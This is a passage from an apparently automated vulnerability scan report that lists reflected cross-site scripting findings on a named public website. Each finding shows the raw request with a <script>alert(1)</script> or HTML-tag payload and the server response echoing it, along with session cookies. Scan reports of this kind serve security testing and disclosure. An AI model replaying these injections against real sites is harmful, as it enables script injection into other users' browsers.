
Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 53b18<a>2c1e5c55c2f was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/search.php?keyword=search...&Submit3=Search53b18<a>2c1e5c55c2f&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/search.php?keyword=search...&Submit3=Search53b18<a>2c1e5c55c2f&opt=2 was not found on this server.</p>
...[SNIP]...

2.2989. http://www.resellerbase.com/detail/41/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 30646<a>6f2a7cab02f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/search.php?keyword=search...30646<a>6f2a7cab02f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/search.php?keyword=search...30646<a>6f2a7cab02f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2990. http://www.resellerbase.com/detail/41/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c61a8<script>alert(1)</script>e6af87751a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=2&c61a8<script>alert(1)</script>e6af87751a2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=2&c61a8<script>alert(1)</script>e6af87751a2=1 was not found on this server.</p>
...[SNIP]...

2.2991. http://www.resellerbase.com/detail/41/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 1a1b4<a>fb3faeed468 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=21a1b4<a>fb3faeed468 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/themes/search.php?keyword=search...&Submit3=Search&opt=21a1b4<a>fb3faeed468 was not found on this server.</p>
...[SNIP]...

2.2992. http://www.resellerbase.com/detail/42/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93ab6<script>alert(1)</script>7d08071507e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail93ab6<script>alert(1)</script>7d08071507e/42/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail93ab6<script>alert(1)</script>7d08071507e/42/ was not found on this server.</p>
...[SNIP]...

2.2993. http://www.resellerbase.com/detail/42/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 579aa<script>alert(1)</script>a3a84ff1b86 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42579aa<script>alert(1)</script>a3a84ff1b86/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42579aa<script>alert(1)</script>a3a84ff1b86/ was not found on this server.</p>
...[SNIP]...

2.2994. http://www.resellerbase.com/detail/42/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5a07e<script>alert(1)</script>a21172be0ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/?5a07e<script>alert(1)</script>a21172be0ad=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/?5a07e<script>alert(1)</script>a21172be0ad=1 was not found on this server.</p>
...[SNIP]...

2.2995. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b3e27<script>alert(1)</script>feed00891a2abcb4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.

Request

GET /detailb3e27<script>alert(1)</script>feed00891a2abcb4d/42/rating.php?id=42&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb3e27<script>alert(1)</script>feed00891a2abcb4d/42/rating.php?id=42&rating=5 was not found on this server.</p>
...[SNIP]...

2.2996. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d2680<script>alert(1)</script>637c5f89d73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild2680<script>alert(1)</script>637c5f89d73/42/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild2680<script>alert(1)</script>637c5f89d73/42/rating.php was not found on this server.</p>
...[SNIP]...

2.2997. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload be5ea<script>alert(1)</script>de25e3a9f0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42be5ea<script>alert(1)</script>de25e3a9f0d/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42be5ea<script>alert(1)</script>de25e3a9f0d/rating.php was not found on this server.</p>
...[SNIP]...

2.2998. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 53032<script>alert(1)</script>8093c8ea8b48715fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.

Request

GET /detail/4253032<script>alert(1)</script>8093c8ea8b48715fa/rating.php?id=42&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4253032<script>alert(1)</script>8093c8ea8b48715fa/rating.php?id=42&rating=5 was not found on this server.</p>
...[SNIP]...

2.2999. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6eddf<script>alert(1)</script>e70a60ca8d2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/rating.php6eddf<script>alert(1)</script>e70a60ca8d2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/rating.php6eddf<script>alert(1)</script>e70a60ca8d2 was not found on this server.</p>
...[SNIP]...

2.3000. http://www.resellerbase.com/detail/42/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9bf95<script>alert(1)</script>c922d0b45affe400f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.

Request

GET /detail/42/rating.php9bf95<script>alert(1)</script>c922d0b45affe400f?id=42&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/rating.php9bf95<script>alert(1)</script>c922d0b45affe400f?id=42&rating=5 was not found on this server.</p>
...[SNIP]...

2.3001. http://www.resellerbase.com/detail/42/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 78757<script>alert(1)</script>bcc3e508e74726d59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, enabling easier demonstration and delivery of the attack.

Request

GET /detail/42/rating.php/78757<script>alert(1)</script>bcc3e508e74726d59?id=42&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/rating.php/78757<script>alert(1)</script>bcc3e508e74726d59?id=42&rating=5 was not found on this server.</p>
...[SNIP]...

2.3002. http://www.resellerbase.com/detail/42/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c5e85<script>alert(1)</script>36ae416770a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/rating.php?c5e85<script>alert(1)</script>36ae416770a=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/rating.php?c5e85<script>alert(1)</script>36ae416770a=1 was not found on this server.</p>
...[SNIP]...

2.3003. http://www.resellerbase.com/detail/42/rivcash-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rivcash-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dd9e4<script>alert(1)</script>de0ca81ae25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildd9e4<script>alert(1)</script>de0ca81ae25/42/rivcash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildd9e4<script>alert(1)</script>de0ca81ae25/42/rivcash-com.html was not found on this server.</p>
...[SNIP]...

2.3004. http://www.resellerbase.com/detail/42/rivcash-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/42/rivcash-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a66d<a>447fc7f8c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/428a66d<a>447fc7f8c7/rivcash-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/428a66d<a>447fc7f8c7/rivcash-com.html was not found on this server.</p>
...[SNIP]...

2.3005. http://www.resellerbase.com/detail/42/rivcash-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/rivcash-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6db0f<script>alert(1)</script>da298dd9905 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/42/6db0f<script>alert(1)</script>da298dd9905 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/42/6db0f<script>alert(1)</script>da298dd9905 was not found on this server.</p>
...[SNIP]...

2.3006. http://www.resellerbase.com/detail/42/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/42/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c3219<script>alert(1)</script>7167d6d94eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc3219<script>alert(1)</script>7167d6d94eb/42/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/42/rivcash-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc3219<script>alert(1)</script>7167d6d94eb/42/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3007. http://www.resellerbase.com/detail/42/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
